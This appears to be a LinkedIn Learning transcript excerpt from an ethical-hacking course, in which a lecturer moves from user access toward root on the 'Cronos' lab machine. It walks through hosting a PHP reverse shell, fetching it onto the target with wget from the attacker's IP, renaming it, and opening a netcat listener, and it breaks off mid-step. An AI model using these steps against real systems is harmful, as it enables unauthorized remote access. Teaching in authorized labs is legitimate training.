LinkedIn respects your privacy

LinkedIn and 3rd parties use essential and non-essential cookies to provide, secure, analyze and improve our Services, and to show you relevant ads (including professional and job ads) on and off LinkedIn. Learn more in our Cookie Policy.

Select Accept to consent or Reject to decline non-essential cookies for this use. You can update your choices at any time in your settings.

Join now Sign in

From the course: Kali Linux for Advanced Pen Testing and Ethical Hacking

Unlock the full course today

Join today to access over 24,900 courses taught by industry experts.

Cronos revisited: Getting to the root

Cronos revisited: Getting to the root - Linux Tutorial

From the course: Kali Linux for Advanced Pen Testing and Ethical Hacking

Start my 1-month free trial Buy for my team

Cronos revisited: Getting to the root

“

- [Lecturer] We can now get into Cronos. and we've got user access. But we want to get to the root. And to do this we'll want to have a user shell. It turns out that Cronos doesn't allow the use of the minus C switch on netcat. So we can't force a reverse shell. However, it does support PHP, so we can use wget to upload our Shelly implant. I've got shelly.php ready with the correct IP address in port. But uploading PHP files through a web exploit can be tricky. So I'll make a copy called shelly.txt, and we'll upload that, then rename it when it's on the target. Copy shelly.php to shelly.txt. And I'll start a web server on port 80. Python -m SimpleHTTPServer port 80. Okay, let's upload our shell. We'll wget http://10.10.14.2/shelly.txt. Okay, and we'll now move shelly.txt and rename it shelly.php. We don't need the HTTP server anymore, so let's clear that. And set up a listener, nc -lvnp 2222. And let's see if…

Contents